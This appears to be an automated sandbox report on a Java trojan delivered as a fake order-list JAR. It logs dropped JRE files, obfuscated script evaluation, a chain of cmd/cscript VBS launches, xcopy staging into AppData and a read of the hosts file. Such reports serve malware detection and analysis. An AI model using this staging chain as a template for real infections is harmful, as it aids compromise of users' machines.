Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp120.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll	Jump to dropped file

Creates license or readme file

Show sources

Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\README.txt	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt	Jump to behavior

Data Obfuscation:

Java code performs script evaluation on high entropy strings

Show sources

Source: Java tracing

Executes: javax.script.AbstractScriptEngine.eval(java.lang.String) on com.sylvans.AloPee.toozleAus=com.parody.bergamot.Alarmclock.getWhiffPrius().getDeclaredMethod("defineClass", com.parody.

Launches a Java Jar file from a suspicious file location

Show sources

Source: Java tracing

Executes: java.lang.ProcessBuilder(java.lang.String[]) on c:\program files\java\jre1.8.0_144\bin\java.exe -jar c:\users\herbbl~1\appdata\local\temp\_0.371006104568627153520436261509485928.class

System Summary:

Dropped file seen in connection with other malware

Show sources

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll EA9D437D0828D399B7FA57BD25F18FC42A0423E35DB0314DB3DC2DF497C9F219
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll 395325970EF0FA1AADCD0BF072A90D28990FB31DD29D70FF8FDA31A7974DE1FB
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll B2C96DF9961DCCE06BB40185ADE8DA3CC5FBD839DCE92EB0B38CD0D21ABE2D9B

Creates files inside the system directory

Show sources

Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe

File created: C:\Windows\System32\test.txt

Jump to behavior

Reads the hosts file

Show sources

Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Classification label

Show sources

Source: classification engine

Classification label: mal96.expl.troj.winJAR@27/212@5/2

Creates files inside the user directory

Show sources

Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe

File created: C:\Users\user\fUTkALeaTxM

Jump to behavior

Creates temporary files

Show sources

Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe

File created: C:\Users\HERBBL~1\AppData\Local\Temp\hsperfdata_user\3376

Jump to behavior

Executable is probably coded in java

Show sources

Source: C:\Windows\System32\cmd.exe

Section loaded: C:\Program Files\Java\jre1.8.0_144\bin\java.dll

Jump to behavior

Executes visual basic scripts

Show sources

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\HERBBL~1\AppData\Local\Temp\Retrive7023066548171428146.vbs

Reads software policies

Show sources

Source: C:\Windows\System32\cmd.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

SQL strings found in memory and binary data

Show sources

Source: jfxwebkit.dll.17.dr	Binary or memory string: SELECT quota FROM Origins where origin=?;
Source: jfxwebkit.dll.17.dr	Binary or memory string: SELECT origin FROM Origins where origin=?;
Source: jfxwebkit.dll.17.dr	Binary or memory string: SELECT COUNT(quota), quota FROM Origins WHERE origin=?SELECT SUM(Caches.size) FROM CacheGroups INNER JOIN Origins ON CacheGroups.origin = Origins.origin INNER JOIN Caches ON CacheGroups.id = Caches.cacheGroup WHERE Origins.origin=?PRAGMA user_versionPRAGMA user_version=%dApplicationCache.dbCREATE TABLE IF NOT EXISTS CacheGroups (id INTEGER PRIMARY KEY AUTOINCREMENT, manifestHostHash INTEGER NOT NULL ON CONFLICT FAIL, manifestURL TEXT UNIQUE ON CONFLICT FAIL, newestCache INTEGER, origin TEXT)CREATE TABLE IF NOT EXISTS Caches (id INTEGER PRIMARY KEY AUTOINCREMENT, cacheGroup INTEGER, size INTEGER)CREATE TABLE IF NOT EXISTS CacheWhitelistURLs (url TEXT NOT NULL ON CONFLICT FAIL, cache INTEGER NOT NULL ON CONFLICT FAIL)CREATE TABLE IF NOT EXISTS CacheAllowsAllNetworkRequests (wildcard INTEGER NOT NULL ON CONFLICT FAIL, cache INTEGER NOT NULL ON CONFLICT FAIL)CREATE TABLE IF NOT EXISTS FallbackURLs (namespace TEXT NOT NULL ON CONFLICT FAIL, fallbackURL TEXT NOT NULL ON CONFLICT FAIL, cache INTEGER NOT NULL ON CONF
Source: jfxwebkit.dll.17.dr	Binary or memory string: SELECT path FROM Databases WHERE origin=? AND name=?;
Source: jfxwebkit.dll.17.dr	Binary or memory string: CREATE TABLE Origins (origin TEXT UNIQUE ON CONFLICT REPLACE, quota INTEGER NOT NULL ON CONFLICT FAIL);
Source: jfxwebkit.dll.17.dr	Binary or memory string: INSERT INTO Databases (origin, name, path) VALUES (?, ?, ?);
Source: jfxwebkit.dll.17.dr	Binary or memory string: CREATE TABLE Databases (guid INTEGER PRIMARY KEY AUTOINCREMENT, origin TEXT, name TEXT, displayName TEXT, estimatedSize INTEGER, path TEXT);
Source: jfxwebkit.dll.17.dr	Binary or memory string: SELECT guid FROM Databases WHERE origin=? AND name=?;
Source: jfxwebkit.dll.17.dr	Binary or memory string: SELECT name FROM sqlite_master WHERE type='table';
Source: jfxwebkit.dll.17.dr	Binary or memory string: SELECT name FROM Databases where origin=?;
Source: jfxwebkit.dll.17.dr	Binary or memory string: CREATE TABLE Origins (origin TEXT UNIQUE ON CONFLICT REPLACE, path TEXT);

Sample is known by Antivirus (Virustotal or Metascan)

Show sources

Source: NEW ORDER .LIST 105.jar

Virustotal: hash found

Spawns processes

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Program Files\Java\jre1.8.0_144\bin\java.exe' -javaagent:'C:\Users\HERBBL~1\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\NEW ORDER .LIST 105.jar'' >> C:\cmdlinestart.log 2>&1
Source: unknown	Process created: C:\Program Files\Java\jre1.8.0_144\bin\java.exe 'C:\Program Files\Java\jre1.8.0_144\bin\java.exe' -javaagent:'C:\Users\HERBBL~1\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\NEW ORDER .LIST 105.jar'
Source: unknown	Process created: C:\Program Files\Java\jre1.8.0_144\bin\java.exe 'C:\Program Files\Java\jre1.8.0_144\bin\java.exe' -jar C:\Users\HERBBL~1\AppData\Local\Temp\_0.371006104568627153520436261509485928.class
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\HERBBL~1\AppData\Local\Temp\Retrive7023066548171428146.vbs
Source: unknown	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\HERBBL~1\AppData\Local\Temp\Retrive7023066548171428146.vbs
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\HERBBL~1\AppData\Local\Temp\Retrive6788100484249657707.vbs
Source: unknown	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\HERBBL~1\AppData\Local\Temp\Retrive6788100484249657707.vbs
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\HERBBL~1\AppData\Local\Temp\Retrive1116934492945913819.vbs
Source: unknown	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\HERBBL~1\AppData\Local\Temp\Retrive1116934492945913819.vbs
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\HERBBL~1\AppData\Local\Temp\Retrive1876200895814508168.vbs
Source: unknown	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\HERBBL~1\AppData\Local\Temp\Retrive1876200895814508168.vbs
Source: unknown	Process created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_144' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: unknown	Process created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_144' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Java\jre1.8.0_144\bin\java.exe 'C:\Program Files\Java\jre1.8.0_144\bin\java.exe' -javaagent:'C:\Users\HERBBL~1\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\NEW ORDER .LIST 105.jar'	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Process created: C:\Program Files\Java\jre1.8.0_144\bin\java.exe 'C:\Program Files\Java\jre1.8.0_144\bin\java.exe' -jar C:\Users\HERBBL~1\AppData\Local\Temp\_0.371006104568627153520436261509485928.class	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\HERBBL~1\AppData\Local\Temp\Retrive6788100484249657707.vbs	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\HERBBL~1\AppData\Local\Temp\Retrive1876200895814508168.vbs	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Process created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_144' 'C:\Users\user\AppData\Roaming\Oracle\' /e	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\HERBBL~1\AppData\Local\Temp\Retrive7023066548171428146.vbs	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\HERBBL~1\AppData\Local\Temp\Retrive1116934492945913819.vbs	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Process created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_144' 'C:\Users\user\AppData\Roaming\Oracle\' /e	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\HERBBL~1\AppData\Local\Temp\Retrive7023066548171428146.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\HERBBL~1\AppData\Local\Temp\Retrive6788100484249657707.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\HERBBL~1\AppData\Local\Temp\Retrive1116934492945913819.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\HERBBL~1\AppData\Local\Temp\Retrive1876200895814508168.vbs	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe

File opened: C:\Program Files\Java\jre1.8.0_144\bin\msvcr100.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libinstrument\instrument.pdb source: instrument.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libawt\awt.pdb source: awt.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libnpt\npt.pdbY" source: npt.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libj2pcsc\j2pcsc.pdb source: j2pcsc.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdb4 source: npjp2.dll.17.dr
Source:	Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: java.exe
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libnet\net.pdb source: net.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libmanagement\management.pdby: source: management.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libnio\nio.pdbic source: nio.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb0 source: javacpl.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\jp2iexp\obj\jp2iexp.pdb< source: jp2iexp.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libfontmanager\fontmanager.pdb@ source: fontmanager.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb source: ssvagent.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libj2pkcs11\j2pkcs11.pdb source: j2pkcs11.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libresource\resource.pdb source: resource.dll.17.dr
Source:	Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: java.exe
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: ktab.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libsplashscreen\splashscreen.pdb source: splashscreen.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\javacpl\obj\javacpl.pdb source: javacpl.cpl.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libjava\java.pdb source: java.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\deployJava1\obj\deployJava1.pdb source: deployJava1.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\deployJava1\obj\deployJava1.pdbL source: deployJava1.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libnet\net.pdby source: net.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libkcms\kcms.pdb source: kcms.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\jp2launcher\obj\jp2launcher.pdbp*A source: jp2launcher.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libt2k\t2k.pdb source: t2k.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libkrb5\w2k_lsa_auth.pdb9' source: w2k_lsa_auth.dll.17.dr
Source:	Binary string: C:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdb source: jvm.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\jp2iexp\obj\jp2iexp.pdb source: jp2iexp.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libmanagement\management.pdb source: management.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libjfr\jfr.pdb source: jfr.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\jp2launcher\obj\jp2launcher.pdb source: jp2launcher.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\jp2native\obj\jp2native.pdb source: jp2native.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: orbd.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libhprof_jvmti\hprof.pdb source: hprof.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb source: jabswitch.exe.17.dr
Source:	Binary string: msvcr100.i386.pdb source: msvcr100.dll0.17.dr, msvcr100.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libbci\bci.pdb source: bci.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: klist.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libdt_shmem\dt_shmem.pdb source: dt_shmem.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libjaas\jaas_nt.pdb source: jaas_nt.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libjdwp\jdwp.pdb source: jdwp.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: kinit.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libawt\awt.pdb8^ source: awt.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libjsound\jsound.pdb source: jsound.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb source: unpack200.exe.17.dr
Source:	Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb source: java.exe
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libjawtaccessbridge\JAWTAccessBridge.pdb source: JAWTAccessBridge.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\eula\obj\eula.pdb source: eula.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libjawt\jawt.pdb source: jawt.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libjli\jli.pdb source: jli.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: keytool.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\liblcms\lcms.pdb source: lcms.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libnio\nio.pdb source: nio.dll.17.dr
Source:	Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdb source: java.exe
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libdcpr\dcpr.pdb source: dcpr.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libmlib_image\mlib_image.pdb9 source: mlib_image.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libjfr\jfr.pdby* source: jfr.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libnpt\npt.pdb source: npt.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libsunmscapi\sunmscapi.pdb source: sunmscapi.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libsunec\sunec.pdb source: sunec.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libwindowsaccessbridge\WindowsAccessBridge.pdb source: WindowsAccessBridge.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\java_objs\java.pdbp source: java.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libjpeg\jpeg.pdb) source: jpeg.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\ssv\obj\ssv.pdb source: ssv.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libmlib_image\mlib_image.pdb source: mlib_image.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: tnameserv.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb source: javacpl.exe.17.dr
Source:	Binary string: msvcp120.i386.pdb source: msvcp120.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\eula\obj\eula.pdb0 source: eula.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libunpack\unpack.pdb source: unpack.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libjavaaccessbridge\JavaAccessBridge.pdb source: JavaAccessBridge.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libjsoundds\jsoundds.pdb source: jsoundds.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libsunmscapi\sunmscapi.pdbi/ source: sunmscapi.dll.17.dr
